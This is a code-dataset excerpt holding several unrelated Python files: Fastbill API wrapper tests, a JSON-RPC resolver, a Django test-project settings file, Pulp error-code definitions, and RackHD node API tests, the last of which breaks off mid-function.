repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
stylight/python-fastbill | tests/test_api.py | 1 | 6430 | #!/usr/bin/env python
# encoding: utf-8
import datetime
import decimal
import httpretty
import json
import unittest
# Set the endpoint to http because some library combination
# leads to a SSLError when running the test with httpretty.
api_endpoint = "http://automatic.fastbill.com/api/1.0/api.php"
api_email = "[email protected]"
api_key = "4"
RESPONSE_DATA = {
'SUBSCRIPTIONS': [
{
'SUBSCRIPTION': {
'SUBSCRIPTION_ID': '1101',
'CUSTOMER_ID': '296526',
'START': '2013-05-24 13:50:33',
'NEXT_EVENT': '2013-06-24 13:50:33',
'CANCELLATION_DATE': '2013-06-24 13:50:33',
'STATUS': 'canceled',
'ARTICLE_NUMBER': '1',
'SUBSCRIPTION_EXT_UID': '',
'LAST_EVENT': '2013-05-24 13:50:33',
}
}
]
}
class JsonTest(unittest.TestCase):
def test_json_encoder(self):
import fastbill
json_dump = json.dumps({
'date': datetime.date(2016, 6, 2),
'datetime': datetime.datetime(2015, 5, 1, 14, 42, 17),
'money': decimal.Decimal("17.23"),
}, cls=fastbill.jsonencoder.CustomJsonEncoder)
self.assertEqual(
json.loads(json_dump),
{'date': '2016-06-02',
'money': '17.23',
'datetime': '2015-05-01 14:42:17'}
)
class TestWrapper(unittest.TestCase):
TESTCASES = {
'customer.get': [
({'country_code': 'at'}, 200, {'CUSTOMERS': []}),
({'country_code': 'de'}, 200, {'CUSTOMERS': [{'NAME': 'Hans'}]}),
],
'getnewargs': [
({}, 400, {u'ERRORS': [u'unknown SERVICE: getnewargs',
u'unknown SERVICE: ']}),
],
'subscription.get': [
({}, 200, {}),
],
'subscription.setusagedata': [
(
{
'USAGE_DATE': datetime.datetime(2015, 5, 1),
'UNIT_PRICE': decimal.Decimal('17.23'),
'CURRENCY_CODE': u'EUR',
},
200,
{}
),
],
}
def test_response(self):
import fastbill
response = RESPONSE_DATA
class FakeAPI(object):
def subscription_get(self, filter=None):
return fastbill.response.FastbillResponse(response, self)
resp = fastbill.response.FastbillResponse(response, FakeAPI())
self.assertEqual(response,
resp.subscriptions[0].subscription.subscription)
self.assertRaises(AttributeError, getattr, resp, 'blah')
resp_iter = iter(resp)
self.assertEqual(next(resp_iter),
response['SUBSCRIPTIONS'][0])
self.assertRaises(StopIteration, next, resp_iter)
@httpretty.activate
def test_wrapper(self):
import fastbill
from mock import Mock
mock = Mock()
class ResponseLookAlike(object):
def __init__(self, status_code):
self.status_code = status_code
def __eq__(self, other):
return self.status_code == other.status_code
api = fastbill.FastbillWrapper(api_email, api_key,
service_url=api_endpoint,
pre_request=mock.pre_request,
post_request=mock.post_request)
for method_name, calls in self.TESTCASES.items():
attribute_name = method_name.replace(".", "_")
try:
method = getattr(api, attribute_name)
except AttributeError:
if not attribute_name.startswith("_"):
raise
for (filter_by, http_code, response) in calls:
def request_callback(method, _, headers,
method_name=method_name,
http_code=http_code,
response=response):
request = json.loads(method.body.decode('utf8'))
request['SERVICE'] = method_name
return (http_code, headers, json.dumps({
'RESPONSE': response,
'REQUEST': request,
}, cls=fastbill.jsonencoder.CustomJsonEncoder))
httpretty.register_uri(httpretty.POST,
api.SERVICE_URL,
body=request_callback)
params = {'filter': filter_by}
if http_code == 200:
result = method(**params)
self.assertEqual(result, response)
else:
self.assertRaises(fastbill.exceptions.FastbillResponseError,
method, **params)
# The actual payload will look like this.
payload = params.copy()
payload.update({
'service': method_name,
'limit': None,
'offset': None,
'data': None
})
mock.pre_request.assert_called_with(
method_name,
payload
)
mock.post_request.assert_called_with(
method_name,
payload,
ResponseLookAlike(http_code)
)
def test_pickle(self):
import pickle
import fastbill
api = fastbill.FastbillWrapper(api_email, api_key,
service_url=api_endpoint,
name="blah")
response = fastbill.response.FastbillResponse(RESPONSE_DATA, api)
pickled_response = pickle.dumps(response)
unpickled_response = pickle.loads(pickled_response)
self.assertTrue(unpickled_response.api is None)
self.assertEqual(
unpickled_response.subscriptions[0].subscription.article_number,
'1')
self.assertRaises(
KeyError,
lambda: unpickled_response.subscriptions[0].subscription.customer)
if __name__ == '__main__':
import nose
nose.runmodule(argv=['-vv', '--with-doctest'])
| mit | 5,063,697,128,748,161,000 | 32.489583 | 80 | 0.487092 | false | 4.566761 | true | false | false |
steffgrez/fast-jsonrpc2 | fast_jsonrpc2/resolver.py | 1 | 2183 | """
from fast_jsonrpc import JSONRPCResolver
def foo(msg)
return 'foobar ' + str(msg)
router = {'foo': foo}
resolver = JSONRPCResolver(router)
json_request = {"jsonrpc": "2.0", "method": "foo", "params": ["toto"], "id": 1}
json_response = resolver.handle(json_request)
print json_response
-> {"jsonrpc": "2.0", "result": "foobar toto", "id": 1}
"""
import json
from fast_jsonrpc2.request import RequestHandler
from fast_jsonrpc2.response import ResponseHandler
class JSONRPCResolver(object):
__slots__ = [
'serializer',
'response_handler',
'request_handler'
]
def __init__(
self,
router,
lazy_check=False,
error_verbose=True,
serializer=json
):
self.serializer = serializer
self.response_handler = ResponseHandler(error_verbose)
self.request_handler = RequestHandler(
self.response_handler, router, lazy_check
)
def handle(self, str_request):
response = None
try:
# handle encoding
if isinstance(str_request, bytes):
str_request = str_request.decode("utf-8")
# get response from unserialized request
try:
request = self.serializer.loads(str_request)
except (TypeError, ValueError):
response = self.response_handler.get_parse_error_response(
data='Bad formatted json'
)
else:
if not request:
response = self.response_handler \
.get_invalid_request_response(
data='Empty request is not allowed'
)
else:
response = self.request_handler.get_response(request)
except Exception as e:
# handle unexpected exception
response = self.response_handler.get_internal_error_response(
data=e.args[0]
)
# return serialized result
return self.serializer.dumps(response) if response else ''
class JSONRPCException(Exception):
pass
| mit | 4,663,643,689,105,370,000 | 26.2875 | 79 | 0.558406 | false | 4.501031 | false | false | false |
ninemoreminutes/django-datatables | test_project/settings.py | 1 | 2955 | # Python
import os
import sys
# Django
from django.conf import global_settings
# Update this module's local settings from the global settings module.
this_module = sys.modules[__name__]
for setting in dir(global_settings):
if setting == setting.upper():
setattr(this_module, setting, getattr(global_settings, setting))
# Absolute path to the directory containing this Django project.
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_ROOT, 'test_project.sqlite3'),
}
}
SITE_ID = 1
STATIC_URL = '/static/'
MIDDLEWARE_CLASSES += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
'devserver.middleware.DevServerMiddleware',
)
TEMPLATE_DIRS = (
#os.path.join(PROJECT_ROOT, 'templates'),
)
ROOT_URLCONF = 'test_project.urls'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
#'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'debug_toolbar',
'devserver',
'django_extensions',
'south',
'sortedm2m',
'fortunecookie',
'datatables',
'test_app',
)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
#'INTERCEPT_REDIRECTS': False,
}
DEVSERVER_DEFAULT_ADDR = '127.0.0.1'
DEVSERVER_DEFAULT_PORT = '8044'
DEVSERVER_MODULES = (
# SQLRealTimeModule is broken with Django 1.6.
#'devserver.modules.sql.SQLRealTimeModule',
'devserver.modules.sql.SQLSummaryModule',
'devserver.modules.profile.ProfileSummaryModule',
# Modules not enabled by default
#'devserver.modules.ajax.AjaxDumpModule',
#'devserver.modules.profile.MemoryUseModule',
#'devserver.modules.cache.CacheSummaryModule',
#'devserver.modules.profile.LineProfilerModule',
)
SECRET_KEY = 'gkwl+r%+^4==^(dnnkv8o#&h&bn=x43*k$h7_e7p+l0w&eba)m'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
}
},
'handlers': {
'console': {
'level': 'INFO',
'class': 'logging.StreamHandler',
},
'null': {
'class': 'django.utils.log.NullHandler',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['console'],
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
'py.warnings': {
'handlers': ['console'],
},
'datatables': {
'handlers': ['console'],
}
}
}
| bsd-3-clause | 7,971,362,363,779,574,000 | 23.221311 | 72 | 0.598308 | false | 3.488784 | false | false | false |
ulif/pulp | common/pulp/common/error_codes.py | 1 | 9417 | from collections import namedtuple
from gettext import gettext as _
Error = namedtuple('Error', ['code', 'message', 'required_fields'])
"""
The error named tuple has 4 components:
code: The 7 character uniquely identifying code for this error, 3 A-Z identifying the module
followed by 4 numeric characters for the msg id. All general pulp server errors start
with PLP
message: The message that will be printed for this error
required_files: A list of required fields for printing the message
"""
# The PLP0000 error is to wrap non-pulp exceptions
PLP0000 = Error("PLP0000",
"%(message)s", ['message'])
PLP0001 = Error("PLP0001",
_("A general pulp exception occurred"), [])
PLP0002 = Error(
"PLP0002",
_("Errors occurred updating bindings on consumers for repo %(repo_id)s and distributor "
"%(distributor_id)s"),
['repo_id', 'distributor_id'])
PLP0003 = Error("PLP0003",
_("Errors occurred removing bindings on consumers while deleting a distributor for "
"repo %(repo_id)s and distributor %(distributor_id)s"),
['repo_id', 'distributor_id'])
PLP0004 = Error("PLP0004",
_("Errors occurred creating bindings for the repository group %(group_id)s. "
"Binding creation was attempted for the repository %(repo_id)s and "
"distributor %(distributor_id)s"),
['repo_id', 'distributor_id', 'group_id'])
PLP0005 = Error("PLP0005",
_("Errors occurred deleting bindings for the repository group %(group_id)s. "
"Binding deletion was attempted for the repository %(repo_id)s and "
"distributor %(distributor_id)s"),
['repo_id', 'distributor_id', 'group_id'])
PLP0006 = Error("PLP0006", _("Errors occurred while updating the distributor configuration for "
"repository %(repo_id)s"),
['repo_id'])
PLP0007 = Error("PLP0007",
_("Error occurred while cascading delete of repository %(repo_id)s to distributor "
"bindings associated with it."),
['repo_id'])
PLP0008 = Error("PLP0008",
_("Error raising error %(code)s. "
"The field [%(field)s] was not included in the error_data."),
['code', 'field'])
PLP0009 = Error("PLP0009", _("Missing resource(s): %(resources)s"), ['resources'])
PLP0010 = Error("PLP0010", _("Conflicting operation reasons: %(reasons)s"), ['reasons'])
PLP0011 = Error("PLP0011", _("Operation timed out after: %(timeout)s"), ['timeout'])
PLP0012 = Error("PLP0012", _("Operation postponed"), [])
PLP0014 = Error("PLP0014", _('Operation not implemented: %(operation_name)s'), ['operation_name'])
PLP0015 = Error("PLP0015", _('Invalid properties: %(properties)s'), ['properties'])
PLP0016 = Error("PLP0016", _('Missing values for: %(properties)s'), ['properties'])
PLP0017 = Error("PLP0017", _('Unsupported properties: %(properties)s'), ['properties'])
PLP0018 = Error("PLP0018", _('Duplicate resource: %(resource_id)s'), ['resource_id'])
PLP0019 = Error("PLP0019", _('Pulp only accepts input encoded in UTF-8: %(value)s'), ['value'])
PLP0020 = Error("PLP0020",
_("Errors occurred installing content for the consumer group %(group_id)s."),
['group_id'])
PLP0021 = Error("PLP0021",
_("Errors occurred updating content for the consumer group %(group_id)s."),
['group_id'])
PLP0022 = Error("PLP0022",
_("Errors occurred uninstalling content for the consumer group %(group_id)s."),
['group_id'])
PLP0023 = Error("PLP0023", _("Task is already in a complete state: %(task_id)s"), ['task_id'])
PLP0024 = Error("PLP0024",
_("There are no Celery workers found in the system for reserved task work. "
"Please ensure that there is at least one Celery worker running, and that the "
"celerybeat service is also running."),
[])
PLP0025 = Error("PLP0025", _("Authentication failed."), [])
PLP0026 = Error(
"PLP0026", _("Permission denied: user %(user)s cannot perform %(operation)s."),
['user', 'operation'])
PLP0027 = Error(
"PLP0027", _("Authentication with username %(user)s failed: invalid SSL certificate."),
['user'])
PLP0028 = Error(
"PLP0028", _("Authentication with username %(user)s failed: invalid oauth credentials."),
['user'])
PLP0029 = Error(
"PLP0029",
_("Authentication with username %(user)s failed: preauthenticated remote user is missing."),
['user'])
PLP0030 = Error(
"PLP0030",
_("Authentication with username %(user)s failed: invalid username or password"), ['user'])
PLP0031 = Error("PLP0031", _("Content source %(id)s could not be found at %(url)s"), ['id', 'url'])
PLP0032 = Error(
"PLP0032", _("Task %(task_id)s encountered one or more failures during execution."),
['task_id'])
PLP0034 = Error("PLP0034", _("The distributor %(distributor_id)s indicated a failed response when "
"publishing repository %(repo_id)s."),
['distributor_id', 'repo_id'])
PLP0037 = Error(
"PLP0037",
_("Content import of %(path)s failed - must be an existing file."),
['path'])
PLP0038 = Error("PLP0038", _("The unit model with id %(model_id)s and class "
"%(model_class)s failed to register. Another model has already "
"been registered with the same id."), ['model_id', 'model_class'])
PLP0040 = Error("PLP0040", _("Database 'seeds' config must include at least one hostname:port "
"value. Refer to /etc/pulp/server.conf for proper use."), [])
PLP0041 = Error("PLP0041", _("Database 'replica_set' config must be specified when more than one "
"seed is provided. Refer to /etc/pulp/server.conf for proper use."),
[])
PLP0042 = Error("PLP0042", _("This request is forbidden."), [])
PLP0043 = Error("PLP0043", _("Database 'write_concern' config can only be 'majority' or 'all'. "
"Refer to /etc/pulp/server.conf for proper use."), [])
PLP0044 = Error("PLP0044", _("The target importer does not support the types from the source"), [])
PLP0045 = Error("PLP0045", _("The repository cannot be exported because some units are "
"not downloaded."), [])
PLP0046 = Error("PLP0046", _("The repository group cannot be exported because these repos have "
"units that are not downloaded: %(repos)s"), ['repos'])
PLP0047 = Error("PLP0047", _("The importer %(importer_id)s indicated a failed response when "
"uploading %(unit_type)s unit to repository %(repo_id)s."),
['importer_id', 'unit_type', 'repo_id'])
PLP0048 = Error("PLP0048", _("The file is expected to be present, but is not, for unit %(unit)s"),
['unit'])
PLP0049 = Error(
"PLP0049",
_('Worker terminated abnormally while processing task %(task_id)s. '
'Check the logs for details'),
['task_id'])
# Create a section for general validation errors (PLP1000 - PLP2999)
# Validation problems should be reported with a general PLP1000 error with a more specific
# error message nested inside of it.
PLP1000 = Error("PLP1000", _("A validation error occurred."), [])
PLP1001 = Error("PLP1001", _("The consumer %(consumer_id)s does not exist."), ['consumer_id'])
PLP1002 = Error("PLP1002", _("The field %(field)s must have a value specified."), ['field'])
PLP1003 = Error(
"PLP1003",
_("The value specified for the field %(field)s must be made up of letters, numbers, "
"underscores, or hyphens with no spaces."),
['field'])
PLP1004 = Error(
"PLP1004",
_("An object of type %(type)s already exists in the database with an id of %(object_id)s"),
['type', 'object_id'])
PLP1005 = Error("PLP1005", _("The checksum type '%(checksum_type)s' is unknown."),
['checksum_type'])
PLP1006 = Error(
"PLP1006", _("The value specified for the field %(field)s may not start with %(value)s."),
['field', 'value'])
PLP1007 = Error("PLP1007", _("The relative path specified must not point outside of the parent"
" directory: %(path)s"), ['path'])
PLP1008 = Error("PLP1008", _("The importer type %(importer_type_id)s does not exist"),
['importer_type_id'])
PLP1009 = Error("PLP1009", _("The request body does not contain valid JSON"), [])
PLP1010 = Error("PLP1010", _("Provided value %(value)s for field %(field)s must be of type "
"%(field_type)s."), ["value", "field", "field_type"])
PLP1011 = Error("PLP1011", _("Invalid task state passed to purge: %(state)s."), ["state"])
PLP1012 = Error("PLP1012", _("No task state given to parameters list for delete."), [])
PLP1013 = Error("PLP1013", _("Checksum does not match calculated value."), [])
PLP1014 = Error("PLP1014", _("The configuration value for the key '%(key)s' in "
"section '%(section)s' is not valid for the following "
"reason: %(reason)s"), ["key", "section", "reason"])
PLP1015 = Error("PLP1015", _("The JSON data must be of type '%(data_type)s'."),
['data_type'])
| gpl-2.0 | 3,952,500,558,581,350,000 | 56.072727 | 100 | 0.609642 | false | 3.846814 | false | false | false |
stuart-stanley/RackHD | test/tests/api/v2_0/nodes_tests.py | 1 | 20157 | from config.api2_0_config import config
from config.amqp import *
from modules.logger import Log
from modules.amqp import AMQPWorker
from modules.worker import WorkerThread, WorkerTasks
from on_http_api2_0 import ApiApi as Api
from on_http_api2_0 import rest
from datetime import datetime
from proboscis.asserts import assert_equal
from proboscis.asserts import assert_false
from proboscis.asserts import assert_raises
from proboscis.asserts import assert_not_equal
from proboscis.asserts import assert_is_not_none
from proboscis.asserts import assert_true
from proboscis.asserts import fail
from proboscis import SkipTest
from proboscis import test
from json import loads
from time import sleep
LOG = Log(__name__)
@test(groups=['nodes_api2.tests'])
class NodesTests(object):
def __init__(self):
self.__client = config.api_client
self.__worker = None
self.__discovery_duration = None
self.__discovered = 0
self.__test_nodes = [
{
'identifiers': ["FF:FF:FF:01"],
'autoDiscover': False,
'name': 'test_switch_node',
'type': 'switch'
},
{
'identifiers': ["FF:FF:FF:02"],
'autoDiscover': False,
'name': 'test_mgmt_node',
'type': 'mgmt'
},
{
'identifiers': ["FF:FF:FF:03"],
'autoDiscover': False,
'name': 'test_pdu_node',
'type': 'pdu'
},
{
'identifiers': ["FF:FF:FF:04"],
'autoDiscover': False,
'name': 'test_enclosure_node',
'type': 'enclosure'
},
{
'identifiers': ["FF:FF:FF:05"],
'autoDiscover': False,
'name': 'test_compute_node',
'type': 'compute'
}
]
self.__test_tags = {
'tags': ['tag1', 'tag2']
}
self.__test_obm = {
'config': {
'host': '1.2.3.4',
'user': 'username',
'password': 'password'
},
'service': 'noop-obm-service'
}
def __get_data(self):
return loads(self.__client.last_response.data)
def __get_workflow_status(self, id, query ):
Api().nodes_get_workflow_by_id(identifier=id, active=query )
data = self.__get_data()
if len(data) > 0:
status = data[0].get('_status')
return status
return 'not running'
def __post_workflow(self, id, graph_name):
status = self.__get_workflow_status(id, 'true')
if status != 'pending' and status != 'running':
Api().nodes_post_workflow_by_id(identifier=id, name=graph_name, body={'name': graph_name})
timeout = 20
while status != 'pending' and status != 'running' and timeout != 0:
LOG.warning('Workflow status for Node {0} (status={1},timeout={2})'.format(id,status,timeout))
status = self.__get_workflow_status(id, 'true')
sleep(1)
timeout -= 1
return timeout
def check_compute_count(self):
Api().nodes_get_all()
nodes = self.__get_data()
count = 0
for n in nodes:
type = n.get('type')
if type == 'compute':
count += 1
return count
@test(groups=['nodes.api2.discovery.test'])
def test_nodes_discovery(self):
""" API 2.0 Testing Graph.Discovery completion """
count = defaults.get('RACKHD_NODE_COUNT', '')
if (count.isdigit() and self.check_compute_count() == int(count)) or self.check_compute_count():
LOG.warning('Nodes already discovered!')
return
self.__discovery_duration = datetime.now()
LOG.info('Wait start time: {0}'.format(self.__discovery_duration))
self.__task = WorkerThread(AMQPWorker(queue=QUEUE_GRAPH_FINISH, \
callbacks=[self.handle_graph_finish]), 'discovery')
def start(worker,id):
worker.start()
tasks = WorkerTasks(tasks=[self.__task], func=start)
tasks.run()
tasks.wait_for_completion(timeout_sec=1200)
assert_false(self.__task.timeout, \
message='timeout waiting for task {0}'.format(self.__task.id))
def handle_graph_finish(self,body,message):
routeId = message.delivery_info.get('routing_key').split('graph.finished.')[1]
Api().workflows_get()
workflows = self.__get_data()
for w in workflows:
injectableName = w.get('injectableName')
if injectableName == 'Graph.SKU.Discovery':
graphId = w.get('context',{}).get('graphId', {})
if graphId == routeId:
message.ack()
status = body.get('status')
if status == 'succeeded' or status == 'failed':
duration = datetime.now() - self.__discovery_duration
msg = {
'graph_name': injectableName,
'status': status,
'route_id': routeId,
'duration': str(duration)
}
if status == 'failed':
msg['active_task'] = w.get('tasks',{})
LOG.error(msg, json=True)
else:
LOG.info(msg, json=True)
self.__discovered += 1
break
check = self.check_compute_count()
if check and check == self.__discovered:
self.__task.worker.stop()
self.__task.running = False
self.__discovered = 0
@test(groups=['test-nodes-api2'], depends_on_groups=['nodes.api2.discovery.test'])
def test_nodes(self):
""" Testing GET:/api/2.0/nodes """
Api().nodes_get_all()
nodes = self.__get_data()
LOG.debug(nodes,json=True)
assert_not_equal(0, len(nodes), message='Node list was empty!')
@test(groups=['test-node-id-api2'], depends_on_groups=['test-nodes-api2'])
def test_node_id(self):
""" Testing GET:/api/2.0/nodes/:id """
Api().nodes_get_all()
nodes = self.__get_data()
LOG.debug(nodes,json=True)
codes = []
for n in nodes:
LOG.info(n,json=True)
if n.get('type') == 'compute':
uuid = n.get('id')
Api().nodes_get_by_id(identifier=uuid)
rsp = self.__client.last_response
codes.append(rsp)
assert_not_equal(0, len(codes), message='Failed to find compute node Ids')
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_get_by_id, 'fooey')
@test(groups=['create-node-api2'], depends_on_groups=['test-node-id-api2'])
def test_node_create(self):
""" Testing POST:/api/2.0/nodes/ """
for n in self.__test_nodes:
LOG.info('Creating node (name={0})'.format(n.get('name')))
Api().nodes_post(identifiers=n)
rsp = self.__client.last_response
assert_equal(201, rsp.status, message=rsp.reason)
@test(groups=['patch-node-api2'], depends_on_groups=['test-node-id-api2'])
def test_node_patch(self):
""" Testing PATCH:/api/2.0/nodes/:id """
data = {"name": 'fake_name_test'}
Api().nodes_get_all()
nodes = self.__get_data()
codes = []
for n in nodes:
if n.get('name') == 'test_compute_node':
uuid = n.get('id')
Api().nodes_patch_by_id(identifier=uuid,body=data)
rsp = self.__client.last_response
test_nodes = self.__get_data()
assert_equal(test_nodes.get('name'), 'fake_name_test', 'Oops patch failed')
codes.append(rsp)
LOG.info('Restoring name to "test_compute_node"')
correct_data = {"name": 'test_compute_node'}
Api().nodes_patch_by_id(identifier=uuid,body=correct_data)
rsp = self.__client.last_response
restored_nodes = self.__get_data()
assert_equal(restored_nodes.get('name'), 'test_compute_node', 'Oops restoring failed')
codes.append(rsp)
assert_not_equal(0, len(codes), message='Failed to find compute node Ids')
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_by_id, 'fooey', data)
@test(groups=['delete-node-api2'], depends_on_groups=['patch-node-api2'])
def test_node_delete(self):
""" Testing DELETE:/api/2.0/nodes/:id """
codes = []
test_names = []
Api().nodes_get_all()
nodes = self.__get_data()
test_names = [t.get('name') for t in self.__test_nodes]
for n in nodes:
name = n.get('name')
if name in test_names:
uuid = n.get('id')
LOG.info('Deleting node {0} (name={1})'.format(uuid, name))
Api().nodes_del_by_id(identifier=uuid)
codes.append(self.__client.last_response)
assert_not_equal(0, len(codes), message='Delete node list empty!')
for c in codes:
assert_equal(204, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_del_by_id, 'fooey')
@test(groups=['catalog_nodes-api2'], depends_on_groups=['delete-node-api2'])
def test_node_catalogs(self):
""" Testing GET:/api/2.0/nodes/:id/catalogs """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_catalog_by_id(identifier=n.get('id'))
resps.append(self.__get_data())
for resp in resps:
assert_not_equal(0, len(resp), message='Node catalog is empty!')
assert_raises(rest.ApiException, Api().nodes_get_catalog_by_id, 'fooey')
@test(groups=['catalog_source-api2'], depends_on_groups=['catalog_nodes-api2'])
def test_node_catalogs_bysource(self):
""" Testing GET:/api/2.0/nodes/:id/catalogs/source """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_catalog_source_by_id(identifier=n.get('id'), source='bmc')
resps.append(self.__client.last_response)
for resp in resps:
assert_equal(200,resp.status, message=resp.reason)
assert_raises(rest.ApiException, Api().nodes_get_catalog_source_by_id, 'fooey','bmc')
@test(groups=['node_workflows-api2'], depends_on_groups=['catalog_source-api2'])
def test_node_workflows_get(self):
""" Testing GET:/api/2.0/nodes/:id/workflows """
resps = []
Api().nodes_get_all()
nodes = self.__get_data()
for n in nodes:
if n.get('type') == 'compute':
Api().nodes_get_workflow_by_id(identifier=n.get('id'))
resps.append(self.__get_data())
# Api().nodes_get_workflow_by_id('fooey')
# try:
# Api().nodes_get_workflow_by_id('fooey')
# fail(message='did not raise exception for nodes_get_workflow_by_id with bad id')
# except rest.ApiException as e:
# assert_equal(404, e.status,
# message='unexpected response {0}, expected 404 for bad nodeId'.format(e.status))
# @test(groups=['node_post_workflows-api2'], depends_on_groups=['node_workflows-api2'])
# def test_node_workflows_post(self):
# """ Testing POST:/api/2.0/nodes/:id/workflows """
# resps = []
# Api().nodes_get_all()
# nodes = self.__get_data()
# for n in nodes:
# if n.get('type') == 'compute':
# id = n.get('id')
# timeout = self.__post_workflow(id,'Graph.Discovery')
# if timeout > 0:
# data = self.__get_data()
# resps.append({'data': data, 'id':id})
# for resp in resps:
# assert_not_equal(0, len(resp['data']),
# message='No Workflows found for Node {0}'.format(resp['id']))
# assert_raises(rest.ApiException, Api().nodes_post_workflow_by_id, 'fooey',name='Graph.Discovery',body={})
# @test(groups=['node_workflows_del_active-api2'], depends_on_groups=['node_post_workflows-api2'])
# def test_workflows_action(self):
# """ Testing PUT:/api/2.0/nodes/:id/workflows/action """
# Api().nodes_get_all()
# nodes = self.__get_data()
# for n in nodes:
# if n.get('type') == 'compute':
# id = n.get('id')
# timeout = 5
# done = False
# while timeout > 0 and done == False:
# if 0 == self.__post_workflow(id,'Graph.Discovery'):
# fail('Timed out waiting for graph to start!')
# try:
# Api().nodes_workflow_action_by_id(id, {'command': 'cancel'})
# done = True
# except rest.ApiException as e:
# if e.status != 404:
# raise e
# timeout -= 1
# assert_not_equal(timeout, 0, message='Failed to delete an active workflow')
# assert_raises(rest.ApiException, Api().nodes_workflow_action_by_id, 'fooey', {'command': 'test'})
@test(groups=['node_tags_patch'], depends_on_groups=['node_workflows-api2'])
def test_node_tags_patch(self):
""" Testing PATCH:/api/2.0/nodes/:id/tags """
codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
codes.append(rsp)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_patch_tag_by_id(identifier=n.get('id'), body=self.__test_tags)
LOG.info('Creating tag (name={0})'.format(self.__test_tags))
rsp = self.__client.last_response
codes.append(rsp)
LOG.info(n.get('id'));
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_tag_by_id, 'fooey',body=self.__test_tags)
@test(groups=['node_tags_get'], depends_on_groups=['node_tags_patch'])
def test_node_tags_get(self):
""" Testing GET:api/2.0/nodes/:id/tags """
codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
codes.append(rsp)
for n in nodes:
Api().nodes_get_tags_by_id(n.get('id'))
rsp = self.__client.last_response
tags = loads(rsp.data)
codes.append(rsp)
for t in self.__test_tags.get('tags'):
assert_true(t in tags, message= "cannot find new tag" )
for c in codes:
assert_equal(200, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_patch_tag_by_id, 'fooey',body=self.__test_tags)
@test(groups=['node_tags_delete'], depends_on_groups=['node_tags_get'])
def test_node_tags_del(self):
""" Testing DELETE:api/2.0/nodes/:id/tags/:tagName """
get_codes = []
del_codes = []
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
get_codes.append(rsp)
for n in nodes:
for t in self.__test_tags.get('tags'):
Api().nodes_del_tag_by_id(identifier=n.get('id'), tag_name=t)
rsp = self.__client.last_response
del_codes.append(rsp)
Api().nodes_get_by_id(identifier=n.get('id'))
rsp = self.__client.last_response
get_codes.append(rsp)
updated_node = loads(rsp.data)
for t in self.__test_tags.get('tags'):
assert_true(t not in updated_node.get('tags'), message= "Tag " + t + " was not deleted" )
for c in get_codes:
assert_equal(200, c.status, message=c.reason)
for c in del_codes:
assert_equal(204, c.status, message=c.reason)
assert_raises(rest.ApiException, Api().nodes_del_tag_by_id, 'fooey',tag_name=['tag'])
@test(groups=['nodes_tag_masterDelete'], depends_on_groups=['node_tags_delete'])
def test_node_tags_masterDel(self):
""" Testing DELETE:api/2.0/nodes/tags/:tagName """
codes = []
self.test_node_tags_patch()
t = 'tag3'
LOG.info("Check to make sure invalid tag is not deleted")
Api().nodes_master_del_tag_by_id(tag_name=t)
rsp = self.__client.last_response
codes.append(rsp)
LOG.info("Test to check valid tags are deleted")
for t in self.__test_tags.get('tags'):
Api().nodes_master_del_tag_by_id(tag_name=t)
rsp = self.__client.last_response
codes.append(rsp)
for c in codes:
assert_equal(204, c.status, message=c.reason)
@test(groups=['node_put_obm_by_node_id'], depends_on_groups=['nodes_tag_masterDelete'])
def test_node_put_obm_by_node_id(self):
"""Testing PUT:/api/2.0/nodes/:id/obm"""
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
assert_equal(200, rsp.status, message=rsp.status)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_put_obms_by_node_id(identifier=n.get('id'), body=self.__test_obm)
LOG.info('Creating obm {0}'.format(self.__test_obm))
rsp = self.__client.last_response
LOG.info(n.get('id'));
assert_equal(201, rsp.status, message=rsp.status)
@test(groups=['node_get_obm_by_node_id'], depends_on_groups=['node_put_obm_by_node_id'])
def test_node_get_obm_by_node_id(self):
"""Testing GET:/api/2.0/:id/obm"""
Api().nodes_get_all()
rsp = self.__client.last_response
nodes = loads(rsp.data)
assert_equal(200, rsp.status, message=rsp.status)
for n in nodes:
LOG.info(n, json=True)
Api().nodes_get_obms_by_node_id(identifier=n.get('id'))
LOG.info('getting OBMs for node {0}'.format(n.get('id')))
rsp = self.__client.last_response
assert_equal(200, rsp.status, message=rsp.status)
obms = loads(rsp.data)
